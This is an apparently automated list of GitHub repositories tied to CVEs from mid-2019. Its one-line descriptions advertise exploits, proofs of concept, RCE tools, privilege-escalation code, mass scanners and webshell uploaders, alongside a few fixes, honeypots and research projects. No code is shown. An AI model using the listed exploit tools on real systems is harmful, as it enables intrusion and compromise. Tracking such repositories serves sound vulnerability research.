**Fortigate CVE-2018-13379 - Tool to search for vulnerable Fortigate hosts in Rapid7 Project Sonar data anonymously through The Tor network.** : [jpiechowka/at-doom-fortigate](https://github.com/jpiechowka/at-doom-fortigate) create time: 2019-08-18T19:24:48Z

**Exploit CVE-2017-16088** : [Flyy-yu/CVE-2017-16088](https://github.com/Flyy-yu/CVE-2017-16088) create time: 2019-08-18T16:22:46Z

**Exploit code for CVE-2019-11707 on Firefox 66.0.3 running on Ubuntu** : [vigneshsrao/CVE-2019-11707](https://github.com/vigneshsrao/CVE-2019-11707) create time: 2019-08-18T07:41:01Z

**CodePath Assignment for Weeks 7 & 8: CVE-2017-14719, CVE-2019-9787 & Unauthenticated Page/Post Content Modification via REST API** : [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8) create time: 2019-08-18T04:50:37Z

**Research Regarding CVE-2019-0708.** : [turingcompl33t/bluekeep](https://github.com/turingcompl33t/bluekeep) create time: 2019-08-18T02:34:31Z

**rce exploit , made to work with pocsuite3** : [dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-](https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-) create time: 2019-08-17T17:23:53Z

**Zimbra RCE CVE-2019-9670** : [attackgithub/Zimbra-RCE](https://github.com/attackgithub/Zimbra-RCE) create time: 2019-08-16T15:22:27Z

**Zimbra RCE PoC - CVE-2019-9670 XXE/SSRF** : [rek7/Zimbra-RCE](https://github.com/rek7/Zimbra-RCE) create time: 2019-08-16T04:37:11Z

**used to generate a valid attack chain to exploit CVE-2017-11774 tied to iranian apt only reasearch poc dont use for harm please** : [devcoinfet/SniperRoost](https://github.com/devcoinfet/SniperRoost) create time: 2019-08-16T01:25:13Z

**Scan a list of given IP's for CVE-2017-12542** : [sk1dish/ilo4-rce-vuln-scanner](https://github.com/sk1dish/ilo4-rce-vuln-scanner) create time: 2019-08-16T00:03:29Z

**Demo app of THAT data broker's security breach** : [injcristianrojas/cve-2017-5638](https://github.com/injcristianrojas/cve-2017-5638) create time: 2019-08-15T22:27:23Z

**Key Negotiation Of Bluetooth (KNOB) attacks on Bluetooth BR/EDR and BLE [CVE-2019-9506]** : [francozappa/knob](https://github.com/francozappa/knob) create time: 2019-08-15T11:54:21Z

**Simple Python script for D-Link vulnerability scan and test [CVE-2019-13101]** : [halencarjunior/dlkploit600](https://github.com/halencarjunior/dlkploit600) create time: 2019-08-15T01:20:45Z

**(FAB-2019-00156) Vulnerability discoverd by me CVE-2019-15053** : [l0nax/CVE-2019-15053](https://github.com/l0nax/CVE-2019-15053) create time: 2019-08-14T18:35:36Z

**CVE-2017-11882(通杀Office 2003到2016)** : [littlebin404/CVE-2017-11882](https://github.com/littlebin404/CVE-2017-11882) create time: 2019-08-14T11:55:00Z

**CVE-2017-16995 ubuntun本地提权 POC** : [littlebin404/CVE-2017-16995](https://github.com/littlebin404/CVE-2017-16995) create time: 2019-08-14T08:21:05Z

**CVE-2019-10708 SQL injection PoC** : [stavhaygn/CVE-2019-10708](https://github.com/stavhaygn/CVE-2019-10708) create time: 2019-08-14T07:15:58Z

**no description** : [major203/cve-2019-1181](https://github.com/major203/cve-2019-1181) create time: 2019-08-14T03:07:02Z

**Linux 本地提权漏洞** : [jas502n/CVE-2016-5195](https://github.com/jas502n/CVE-2016-5195) create time: 2019-08-13T10:38:49Z

**OpenEMR security issue** : [Wezery/CVE-2019-14530](https://github.com/Wezery/CVE-2019-14530) create time: 2019-08-13T01:33:11Z

**OpenEMR Security issue** : [Wezery/CVE-2019-14529](https://github.com/Wezery/CVE-2019-14529) create time: 2019-08-13T01:01:51Z

**Proof of Concept of TrustZone exploit** : [RKX1209/CVE-2019-1010298](https://github.com/RKX1209/CVE-2019-1010298) create time: 2019-08-12T15:58:06Z

**Apache Solr远程代码执行漏洞(CVE-2019-0193) Exploit** : [1135/solr_exploit](https://github.com/1135/solr_exploit) create time: 2019-08-12T07:17:21Z

**Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network.** : [lodi-g/CVE-2019-13361](https://github.com/lodi-g/CVE-2019-13361) create time: 2019-08-11T20:21:07Z

**CVE-2018-13382** : [milo2012/CVE-2018-13382](https://github.com/milo2012/CVE-2018-13382) create time: 2019-08-11T11:13:44Z

**CVE-2018-13379** : [milo2012/CVE-2018-13379](https://github.com/milo2012/CVE-2018-13379) create time: 2019-08-11T09:44:37Z

**no description** : [GitHubAssessments/CVE_07_2019](https://github.com/GitHubAssessments/CVE_07_2019) create time: 2019-08-10T00:24:28Z

**A Proof of Concept for CVE-2019-14751** : [mssalvatore/CVE-2019-14751_PoC](https://github.com/mssalvatore/CVE-2019-14751_PoC) create time: 2019-08-09T16:56:54Z

**CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3)** : [Hydra3evil/cve-2018-12386](https://github.com/Hydra3evil/cve-2018-12386) create time: 2019-08-09T07:58:03Z

**Apache Solr DataImport Handler RCE** : [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193) create time: 2019-08-09T06:27:39Z

**no description** : [HckEX/CVE-2017-11176](https://github.com/HckEX/CVE-2017-11176) create time: 2019-08-08T01:02:52Z

**CVE-2019-14537 PoC** : [Wocanilo/CVE-2019-14537](https://github.com/Wocanilo/CVE-2019-14537) create time: 2019-08-07T11:25:39Z

**linux 提权** : [oneoy/CVE-2019-13272](https://github.com/oneoy/CVE-2019-13272) create time: 2019-08-07T01:21:26Z

**no description** : [aforakjackson/cve2010-2333](https://github.com/aforakjackson/cve2010-2333) create time: 2019-08-05T18:02:40Z

**:unlock: transfer ownership of any FB50 smart lock to yourself (CVE-2019-13143)** : [securelayer7/pwnfb50](https://github.com/securelayer7/pwnfb50) create time: 2019-08-05T15:45:02Z

**no description** : [Lee-SungYoung/cve-2019-5736-study](https://github.com/Lee-SungYoung/cve-2019-5736-study) create time: 2019-08-05T10:15:52Z

**Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.** : [ThanHuuTuan/Heartexploit](https://github.com/ThanHuuTuan/Heartexploit) create time: 2019-08-05T10:09:44Z

**no description** : [aforakjackson/cve20053299](https://github.com/aforakjackson/cve20053299) create time: 2019-08-05T01:59:54Z

**no description** : [aforakjackson/cve2005-3299](https://github.com/aforakjackson/cve2005-3299) create time: 2019-08-05T01:58:45Z

**CVE-2018-16509 Docker Playground - Ghostscript command execution** : [rhpco/CVE-2018-16509](https://github.com/rhpco/CVE-2018-16509) create time: 2019-08-04T10:09:31Z

**no description** : [solomolo/CVe-2019](https://github.com/solomolo/CVe-2019) create time: 2019-08-04T08:44:26Z

**提权漏洞** : [bigbigliang-malwarebenchmark/cve-2019-13272](https://github.com/bigbigliang-malwarebenchmark/cve-2019-13272) create time: 2019-08-04T06:51:36Z

**CVE-2019-2525 / CVE-2019-2548** : [wotmd/VirtualBox-6.0.0-Exploit-1-day](https://github.com/wotmd/VirtualBox-6.0.0-Exploit-1-day) create time: 2019-08-03T12:25:41Z

**this is not stable** : [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://github.com/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC) create time: 2019-08-03T07:38:18Z

**CVE-2019-7839** : [securifera/CVE-2019-7839](https://github.com/securifera/CVE-2019-7839) create time: 2019-08-03T05:39:22Z

**漏洞demo** : [Rivaill/CVE_2019_14234](https://github.com/Rivaill/CVE_2019_14234) create time: 2019-08-03T04:49:56Z

**no description** : [securifera/CVE-2017-9830](https://github.com/securifera/CVE-2017-9830) create time: 2019-08-03T03:29:12Z

**CVE-2019-13498** : [FurqanKhan1/CVE-2019-13498](https://github.com/FurqanKhan1/CVE-2019-13498) create time: 2019-08-02T21:22:23Z

**SSH account enumeration verification script(CVE-2018-15473)** : [NHPT/SSH-account-enumeration-verification-script](https://github.com/NHPT/SSH-account-enumeration-verification-script) create time: 2019-08-02T08:50:34Z

**no description** : [Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548](https://github.com/Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548) create time: 2019-08-01T08:25:53Z

**Jackson-databind RCE** : [jas502n/CVE-2019-14439](https://github.com/jas502n/CVE-2019-14439) create time: 2019-08-01T05:33:06Z

**The exploit for CVE-2019-13272** : [Cyc1eC/CVE-2019-13272](https://github.com/Cyc1eC/CVE-2019-13272) create time: 2019-07-31T06:36:21Z

**Linux 4.10 < 5.1.17 PTRACE_TRACEME local root** : [jas502n/CVE-2019-13272](https://github.com/jas502n/CVE-2019-13272) create time: 2019-07-31T04:51:43Z

**CVE-2019-1132** : [petercc/CVE-2019-1132](https://github.com/petercc/CVE-2019-1132) create time: 2019-07-31T02:30:28Z

**PoC for CVE-2019-10207** : [butterflyhack/CVE-2019-10207](https://github.com/butterflyhack/CVE-2019-10207) create time: 2019-07-30T08:39:21Z

**no description** : [quandqn/cve-2018-14667](https://github.com/quandqn/cve-2018-14667) create time: 2019-07-29T03:22:22Z

**ProFTPd mod_copy - arbitrary file copy without authentication** : [KTN1990/CVE-2019-12815](https://github.com/KTN1990/CVE-2019-12815) create time: 2019-07-27T21:26:06Z

**no description** : [infiniteLoopers/CVE-2019-2107](https://github.com/infiniteLoopers/CVE-2019-2107) create time: 2019-07-27T19:03:27Z

**CVE-2018-18368 SEP Manager EoP Exploit** : [DimopoulosElias/SEPM-EoP](https://github.com/DimopoulosElias/SEPM-EoP) create time: 2019-07-27T10:22:19Z

**Some debug notes and exploit(not blind)** : [verctor/nexus_rce_CVE-2019-7238](https://github.com/verctor/nexus_rce_CVE-2019-7238) create time: 2019-07-26T16:08:40Z

**EoP POC for CVE-2019-1132** : [Vlad-tri/CVE-2019-1132](https://github.com/Vlad-tri/CVE-2019-1132) create time: 2019-07-26T06:51:28Z

**CVE-2019-12384 漏洞测试环境** : [MagicZer0/Jackson_RCE-CVE-2019-12384](https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384) create time: 2019-07-26T03:24:38Z

**POC for CVE-2019-14339 Canon PRINT 2.5.5** : [0x48piraj/CVE-2019-14339](https://github.com/0x48piraj/CVE-2019-14339) create time: 2019-07-25T09:30:02Z

**no description** : [CrackerCat/cve-2019-1096-poc](https://github.com/CrackerCat/cve-2019-1096-poc) create time: 2019-07-25T07:58:44Z

**CVE-2019–11581 PoC** : [kobs0N/CVE-2019-11581](https://github.com/kobs0N/CVE-2019-11581) create time: 2019-07-25T05:29:23Z

**收集网上CVE-2018-0708的poc和exp(目前没有找到exp)** : [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708) create time: 2019-07-25T01:05:21Z

**Exim Honey Pot for CVE-2019-10149 exploit attempts.** : [Brets0150/StickyExim](https://github.com/Brets0150/StickyExim) create time: 2019-07-25T00:46:37Z

**Jackson Rce For CVE-2019-12384** : [jas502n/CVE-2019-12384](https://github.com/jas502n/CVE-2019-12384) create time: 2019-07-24T07:12:14Z

**My old sysret / ptrace PoC** : [vnik5287/cve-2014-4699-ptrace](https://github.com/vnik5287/cve-2014-4699-ptrace) create time: 2019-07-23T12:39:21Z

**CVE-2017-16995 eBPF PoC for Ubuntu 16.04** : [vnik5287/CVE-2017-16995](https://github.com/vnik5287/CVE-2017-16995) create time: 2019-07-23T12:37:27Z

**perf_swevent_init** : [vnik5287/CVE-2013-2094](https://github.com/vnik5287/CVE-2013-2094) create time: 2019-07-23T12:31:55Z

**cve-2016-6187** : [vnik5287/cve-2016-6187-poc](https://github.com/vnik5287/cve-2016-6187-poc) create time: 2019-07-23T12:30:02Z

**cve-2014-4014** : [vnik5287/cve-2014-4014-privesc](https://github.com/vnik5287/cve-2014-4014-privesc) create time: 2019-07-23T12:24:43Z

**Public work for CVE-2019-0708** : [0xeb-bp/bluekeep](https://github.com/0xeb-bp/bluekeep) create time: 2019-07-23T03:15:53Z

**no description** : [sasqwatch/cve-2019-11477-poc](https://github.com/sasqwatch/cve-2019-11477-poc) create time: 2019-07-22T20:23:08Z

**ptl cve-2018-6574** : [french560/ptl6574](https://github.com/french560/ptl6574) create time: 2019-07-22T13:13:06Z

**Siemens TIA administrator Tool RCE** : [jiansiting/CVE-2019-10915](https://github.com/jiansiting/CVE-2019-10915) create time: 2019-07-22T02:38:54Z

**no description** : [Y0n0Y/cve-2018-8120-exp](https://github.com/Y0n0Y/cve-2018-8120-exp) create time: 2019-07-20T14:21:03Z

**Microsoft Edge Elevation of Privilege Vulnerability** : [c0d3G33k/CVE-2019-0678](https://github.com/c0d3G33k/CVE-2019-0678) create time: 2019-07-19T11:55:32Z

**no description** : [jguard01/cve-2018-11882](https://github.com/jguard01/cve-2018-11882) create time: 2019-07-19T01:40:05Z

**CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.** : [andripwn/CVE-2018-18852](https://github.com/andripwn/CVE-2018-18852) create time: 2019-07-18T20:57:59Z

**Scanner PoC for CVE-2019-0708 RDP RCE vuln** : [andripwn/CVE-2019-0708](https://github.com/andripwn/CVE-2019-0708) create time: 2019-07-18T20:53:54Z

**Proof of calc for CVE-2019-6453** : [andripwn/mIRC-CVE-2019-6453](https://github.com/andripwn/mIRC-CVE-2019-6453) create time: 2019-07-18T20:40:09Z

**A fix for CVE-2019-11358 (prototype pollution in jquery)** : [bitnesswise/jquery-prototype-pollution-fix](https://github.com/bitnesswise/jquery-prototype-pollution-fix) create time: 2019-07-18T19:15:33Z

**CVE-2019-0708 Exploit Tool** : [cve-2019-0708-poc/cve-2019-0708](https://github.com/cve-2019-0708-poc/cve-2019-0708) create time: 2019-07-18T08:41:01Z

**软件系统安全结课作业:[漏洞复现] CVE-2018-4878 Flash 0day** : [HuanWoWeiLan/SoftwareSystemSecurity-2019](https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019) create time: 2019-07-17T16:41:09Z

**CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE** : [jas502n/CVE-2019-11580](https://github.com/jas502n/CVE-2019-11580) create time: 2019-07-17T07:54:38Z

**Html.Exploit.CVE_2019_0541** : [H4xl0r/CVE_2019_0541](https://github.com/H4xl0r/CVE_2019_0541) create time: 2019-07-17T02:58:54Z

**Remote code execution in Atlassian Jira(CVE-2019–11581) through template engine FreeMaker** : [r0hack/RCE-in-Jira](https://github.com/r0hack/RCE-in-Jira) create time: 2019-07-16T16:04:59Z

**no description** : [masahiro331/CVE-2019-13574](https://github.com/masahiro331/CVE-2019-13574) create time: 2019-07-16T07:17:57Z

**Atlassian JIRA Template injection vulnerability RCE** : [jas502n/CVE-2019-11581](https://github.com/jas502n/CVE-2019-11581) create time: 2019-07-16T02:27:00Z

**Stored XSS in MicroStrategy Web prior to 10.4.6** : [undefinedmode/CVE-2019-12475](https://github.com/undefinedmode/CVE-2019-12475) create time: 2019-07-15T14:42:53Z

**Authenticated XSS in Microstrategy Web - Versions prior to 10.1 patch 10** : [undefinedmode/CVE-2019-12453](https://github.com/undefinedmode/CVE-2019-12453) create time: 2019-07-15T14:17:10Z

**Proof of concept tool to exploit the directory traversal and local file inclusion vulnerability that resides in the Sahi-pro web application CVE-2019-13063** : [0x6b7966/CVE-2019-13063-POC](https://github.com/0x6b7966/CVE-2019-13063-POC) create time: 2019-07-15T09:45:36Z

**Metasploit module for massive Denial of Service using #Bluekeep vector.** : [mekhalleh/cve-2019-0708](https://github.com/mekhalleh/cve-2019-0708) create time: 2019-07-14T18:43:48Z

**CVE-2019-13403** : [B3Bo1d/CVE-2019-13403](https://github.com/B3Bo1d/CVE-2019-13403) create time: 2019-07-14T05:52:01Z

**CVE-2019-9766 React** : [moonheadobj/CVE-2019-9766](https://github.com/moonheadobj/CVE-2019-9766) create time: 2019-07-14T05:18:02Z

**R/W** : [0x43434343/CVE-2019-0539](https://github.com/0x43434343/CVE-2019-0539) create time: 2019-07-12T13:06:17Z

**no description** : [us3r777/CVE-2018-20718](https://github.com/us3r777/CVE-2018-20718) create time: 2019-07-10T18:19:59Z

**no description** : [nulsect0r/CVE-2019-12889](https://github.com/nulsect0r/CVE-2019-12889) create time: 2019-07-10T17:49:51Z

**Exploit for TSIG bypass vulnerabilities in Bind (CVE-2017-3143) and Knot DNS (CVE-2017-11104)** : [saaph/CVE-2017-3143](https://github.com/saaph/CVE-2017-3143) create time: 2019-07-10T16:25:15Z

**CVE-2019-0785** : [Jaky5155/CVE-2019-0785](https://github.com/Jaky5155/CVE-2019-0785) create time: 2019-07-10T13:16:42Z

**CVE‑2019‑5680** : [balika011/selfblow](https://github.com/balika011/selfblow) create time: 2019-07-09T21:05:53Z

**no description** : [morhax/CVE-2018-11235](https://github.com/morhax/CVE-2018-11235) create time: 2019-07-09T08:28:49Z

**CVE-2019-2107** : [marcinguy/CVE-2019-2107](https://github.com/marcinguy/CVE-2019-2107) create time: 2019-07-08T14:18:33Z

**no description** : [thepwnrip/leHACK-Analysis-of-CVE-2018-8453](https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453) create time: 2019-07-08T13:06:10Z

**Details for disclosing CVE-2019-13027** : [IckoGZ/CVE-2019-13027](https://github.com/IckoGZ/CVE-2019-13027) create time: 2019-07-08T08:25:07Z

**PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.** : [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2) create time: 2019-07-05T11:55:41Z

**Whitepaper for CVE-2016-3238/MS16-087 Proof Of concept.** : [pyiesone/CVE-2016-3238-PoC](https://github.com/pyiesone/CVE-2016-3238-PoC) create time: 2019-07-05T06:49:09Z

**Exp of cve-2019-12272** : [HACHp1/LuCI_RCE_exp](https://github.com/HACHp1/LuCI_RCE_exp) create time: 2019-07-04T04:54:36Z

**no description** : [ze0r/CVE-2019-0708-exp](https://github.com/ze0r/CVE-2019-0708-exp) create time: 2019-07-04T01:49:22Z

**no description** : [imjdl/CVE-2012-4431](https://github.com/imjdl/CVE-2012-4431) create time: 2019-07-03T14:13:23Z

**https://github.com/Yt1g3r/CVE-2019-3396_EXP.git** : [tanw923/test1](https://github.com/tanw923/test1) create time: 2019-07-01T09:35:17Z

**no description** : [TrungNguyen1909/CVE-2019-6225-macOS](https://github.com/TrungNguyen1909/CVE-2019-6225-macOS) create time: 2019-06-30T17:26:53Z

**Proof of concept code for breaking out of docker via runC** : [RyanNgWH/CVE-2019-5736-POC](https://github.com/RyanNgWH/CVE-2019-5736-POC) create time: 2019-06-30T13:42:14Z

**Zapierd-test** : [ISSAPolska/CVE-2016-10761](https://github.com/ISSAPolska/CVE-2016-10761) create time: 2019-06-30T08:27:15Z

**weblogic_CVE_2017_10271漏洞批量检测&getshell** : [rambleZzz/weblogic_CVE_2017_10271](https://github.com/rambleZzz/weblogic_CVE_2017_10271) create time: 2019-06-28T01:17:32Z

**This is a PoC for CVE-2019-12594, a vulnerability in DOSBox 0.74-2.** : [Alexandre-Bartel/CVE-2019-12594](https://github.com/Alexandre-Bartel/CVE-2019-12594) create time: 2019-06-27T15:49:16Z

**Binary** : [Jos675/CVE-2017-0213-Exploit](https://github.com/Jos675/CVE-2017-0213-Exploit) create time: 2019-06-27T05:56:35Z

**no description** : [JasonLOU/CVE_2018_15982](https://github.com/JasonLOU/CVE_2018_15982) create time: 2019-06-27T02:02:17Z

**CVE-2019-10149 privilege escalation** : [AzizMea/CVE-2019-10149-privilege-escalation](https://github.com/AzizMea/CVE-2019-10149-privilege-escalation) create time: 2019-06-27T01:34:41Z

**cve-2019-0604 SharePoint RCE exploit** : [k8gege/CVE-2019-0604](https://github.com/k8gege/CVE-2019-0604) create time: 2019-06-26T15:00:29Z

**spectre v4 : Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux** : [Shuiliusheng/CVE-2018-3639-specter-v4-](https://github.com/Shuiliusheng/CVE-2018-3639-specter-v4-) create time: 2019-06-26T14:26:13Z

**CVE-2019-12949** : [tarantula-team/CVE-2019-12949](https://github.com/tarantula-team/CVE-2019-12949) create time: 2019-06-25T03:22:23Z

**CVE-2017-8759 微软word漏洞利用脚本** : [adeljck/CVE-2017-8759](https://github.com/adeljck/CVE-2017-8759) create time: 2019-06-25T02:17:04Z

**POC CVE-2019-0708 with python script!** : [cvencoder/cve-2019-0708](https://github.com/cvencoder/cve-2019-0708) create time: 2019-06-24T16:03:08Z

**no description** : [fox-it/cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) create time: 2019-06-24T15:33:50Z

**Weblogic CVE-2019-2725 CVE-2019-2729 Getshell 命令执行** : [black-mirror/Weblogic](https://github.com/black-mirror/Weblogic) create time: 2019-06-24T08:33:07Z

**Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776.** : [OzNetNerd/apche-struts-vuln-demo-cve-2018-11776](https://github.com/OzNetNerd/apche-struts-vuln-demo-cve-2018-11776) create time: 2019-06-24T02:51:09Z

**CVE-2018-11235(PoC && Exp)** : [AnonymKing/CVE-2018-11235](https://github.com/AnonymKing/CVE-2018-11235) create time: 2019-06-22T14:39:08Z

**PoC for CVE-2019-0888 - Use-After-Free in Windows ActiveX Data Objects (ADO)** : [sophoslabs/CVE-2019-0888](https://github.com/sophoslabs/CVE-2019-0888) create time: 2019-06-21T22:26:52Z

**增强版WeblogicScan、检测结果更精确、插件化、添加CVE-2019-2618,CVE-2019-2729检测,Python3支持** : [dr0op/WeblogicScan](https://github.com/dr0op/WeblogicScan) create time: 2019-06-21T09:22:43Z

**CVE-2015-3337 ElasticSearch 任意文件读取** : [jas502n/CVE-2015-3337](https://github.com/jas502n/CVE-2015-3337) create time: 2019-06-21T09:06:49Z

**no description** : [whisp1830/CVE-2017-15715](https://github.com/whisp1830/CVE-2017-15715) create time: 2019-06-21T04:05:32Z

**CVE-2018-17456漏洞复现(PoC+Exp)** : [AnonymKing/CVE-2018-17456](https://github.com/AnonymKing/CVE-2018-17456) create time: 2019-06-21T03:17:26Z

**CVE-2017-1000117漏洞复现(PoC+Exp)** : [AnonymKing/CVE-2017-1000117](https://github.com/AnonymKing/CVE-2017-1000117) create time: 2019-06-20T02:55:19Z

**no description** : [wdfcc/CVE-2019-0708](https://github.com/wdfcc/CVE-2019-0708) create time: 2019-06-20T02:19:17Z

**OpenSSH 用户名枚举漏洞(CVE-2018-15473)** : [trickster1103/-](https://github.com/trickster1103/-) create time: 2019-06-19T13:37:58Z

**Updated version for the tool UltraRealy with support of the CVE-2019-1040 exploit** : [lazaars/UltraRealy_with_CVE-2019-1040](https://github.com/lazaars/UltraRealy_with_CVE-2019-1040) create time: 2019-06-19T08:32:31Z

**no description** : [pwnhacker0x18/CVE-2018-19864](https://github.com/pwnhacker0x18/CVE-2018-19864) create time: 2019-06-18T19:54:26Z

**no description** : [oldthree3/CVE-2019-12735-VIM-NEOVIM](https://github.com/oldthree3/CVE-2019-12735-VIM-NEOVIM) create time: 2019-06-18T16:59:39Z

**CVE-2019-1040 with Kerberos delegation** : [Ridter/CVE-2019-1040-dcpwn](https://github.com/Ridter/CVE-2019-1040-dcpwn) create time: 2019-06-18T12:10:26Z

**This repository will contain information regarding CVE-2019-12796 once it is made public.** : [PeterUpfold/CVE-2019-12796](https://github.com/PeterUpfold/CVE-2019-12796) create time: 2019-06-17T15:47:12Z

**no description** : [VikasVarshney/CVE_2018_6574](https://github.com/VikasVarshney/CVE_2018_6574) create time: 2019-06-17T05:31:34Z

**My first iOS 'jailbreak' , using CVE 2016-4655 & CVE 2016-4656** : [tomitokics/br0ke](https://github.com/tomitokics/br0ke) create time: 2019-06-16T18:02:09Z

**no description** : [IHA114/CVE-2018-9995_dvr_credentials](https://github.com/IHA114/CVE-2018-9995_dvr_credentials) create time: 2019-06-16T11:18:00Z

**CVE-2019-1064 - AppXSVC Local Privilege Escalation** : [attackgithub/CVE-2019-1064](https://github.com/attackgithub/CVE-2019-1064) create time: 2019-06-16T09:31:11Z

**CVE-2019-2725 bypass pocscan and exp** : [kerlingcode/CVE-2019-2725](https://github.com/kerlingcode/CVE-2019-2725) create time: 2019-06-16T06:17:09Z

**CVE-2019-12836** : [9lyph/CVE-2019-12836](https://github.com/9lyph/CVE-2019-12836) create time: 2019-06-16T04:41:29Z

**no description** : [VikasVarshney/cve_test_2018_6574](https://github.com/VikasVarshney/cve_test_2018_6574) create time: 2019-06-15T13:35:13Z

**weblogic绕过和wls远程执行** : [jiansiting/CVE-2019-2725](https://github.com/jiansiting/CVE-2019-2725) create time: 2019-06-15T12:51:19Z

**contains APIs created in Mar 2019 to view cve/epv reports names and content** : [anuragtr/fabric8-gemini-server-backup](https://github.com/anuragtr/fabric8-gemini-server-backup) create time: 2019-06-15T12:40:50Z

**Simple Bash shell quick fix CVE-2019-10149** : [aishee/CVE-2019-10149-quick](https://github.com/aishee/CVE-2019-10149-quick) create time: 2019-06-14T14:02:43Z

**CVE-2019-1040 with Exchange** : [Ridter/CVE-2019-1040](https://github.com/Ridter/CVE-2019-1040) create time: 2019-06-14T11:16:03Z

**PoC for CVE-2019-10149, this vulnerability could be xploited betwen 4-87 to 4.91 version of Exim server.** : [MNEMO-CERT/PoC--CVE-2019-10149_Exim](https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim) create time: 2019-06-13T23:21:53Z

**Liferay XSL - Command Execution (Metasploit)** : [noobpk/CVE-2011-1571](https://github.com/noobpk/CVE-2011-1571) create time: 2019-06-13T07:16:38Z

**LPE Exploit For CVE-2019-12181 (Serv-U FTP 15.1.6)** : [guywhataguy/CVE-2019-12181](https://github.com/guywhataguy/CVE-2019-12181) create time: 2019-06-12T22:18:45Z

**CVE-2019-1064 Local Privilege Escalation Vulnerability** : [0x00-0x00/CVE-2019-1064](https://github.com/0x00-0x00/CVE-2019-1064) create time: 2019-06-12T15:54:55Z

**CVE-2019-1064 Local Privilege Escalation Vulnerability** : [RythmStick/CVE-2019-1064](https://github.com/RythmStick/CVE-2019-1064) create time: 2019-06-12T10:21:35Z

**CVE-2019-XXXX | Dolibarr ERP 9.0.1 application has directory listing vulnerability.** : [berkayipek/Dolibarr-ERP-CMS-Vulnerability](https://github.com/berkayipek/Dolibarr-ERP-CMS-Vulnerability) create time: 2019-06-12T05:10:38Z

**simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /tmp/eximrce.** : [cowbe0x004/eximrce-CVE-2019-10149](https://github.com/cowbe0x004/eximrce-CVE-2019-10149) create time: 2019-06-12T03:47:16Z

**CVE-2019-0708-Msf-验证** : [cream-sec/CVE-2019-0708-Msf--](https://github.com/cream-sec/CVE-2019-0708-Msf--) create time: 2019-06-12T03:37:39Z

**A fully automatic CVE-2019-0841 bypass targeting all versions of Edge in Windows 10.** : [0x00-0x00/CVE-2019-0841-BYPASS](https://github.com/0x00-0x00/CVE-2019-0841-BYPASS) create time: 2019-06-11T20:05:26Z

**Lets have fun by digging into a Zyxel router firmware and MIPS Arch** : [BenChaliah/MIPS-CVE-2014-9222](https://github.com/BenChaliah/MIPS-CVE-2014-9222) create time: 2019-06-11T18:00:36Z

**CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.** : [at0mik/CVE-2019-0708-PoC](https://github.com/at0mik/CVE-2019-0708-PoC) create time: 2019-06-11T09:38:36Z

**vmware cloudburst exploit CVE-2009-1244** : [piotrbania/vmware_exploit_pack_CVE-2009-1244](https://github.com/piotrbania/vmware_exploit_pack_CVE-2009-1244) create time: 2019-06-11T09:08:52Z

**CVE-2019-0708批量检测** : [Pa55w0rd/CVE-2019-0708](https://github.com/Pa55w0rd/CVE-2019-0708) create time: 2019-06-11T05:38:26Z

**no description** : [welove88888/CVE-2019-2725](https://github.com/welove88888/CVE-2019-2725) create time: 2019-06-11T00:49:56Z

**quick fix for CVE-2019-10149, works on Debian\Ubuntu\Centos** : [bananaphones/exim-rce-quickfix](https://github.com/bananaphones/exim-rce-quickfix) create time: 2019-06-10T19:37:05Z

**no description** : [0katz/CVE-2019-12476](https://github.com/0katz/CVE-2019-12476) create time: 2019-06-10T18:14:34Z

**POC of CVE-2018-8718 + tool** : [GeunSam2/CVE-2018-8718](https://github.com/GeunSam2/CVE-2018-8718) create time: 2019-06-10T15:16:41Z

**exploit tool of CVE-2018-11564** : [GeunSam2/CVE-2018-11564](https://github.com/GeunSam2/CVE-2018-11564) create time: 2019-06-10T15:15:07Z

**exploit tool of CVE-2018-10118** : [GeunSam2/CVE-2018-10118](https://github.com/GeunSam2/CVE-2018-10118) create time: 2019-06-10T15:13:25Z

**POC of CVE-2017-5487 + tool** : [GeunSam2/CVE-2017-5487](https://github.com/GeunSam2/CVE-2017-5487) create time: 2019-06-10T15:07:17Z

**CVE-2019-2725命令回显+webshell上传+最新绕过** : [TopScrew/CVE-2019-2725](https://github.com/TopScrew/CVE-2019-2725) create time: 2019-06-10T05:12:44Z

**CVE-2019-0859 1day Exploit** : [Sheisback/CVE-2019-0859-1day-Exploit](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit) create time: 2019-06-07T04:37:34Z

**no description** : [CVCLabs/cve-2019-2725](https://github.com/CVCLabs/cve-2019-2725) create time: 2019-06-06T19:27:09Z

**no description** : [MaxSecurity/CVE-2017-7529-POC](https://github.com/MaxSecurity/CVE-2017-7529-POC) create time: 2019-06-06T14:47:17Z

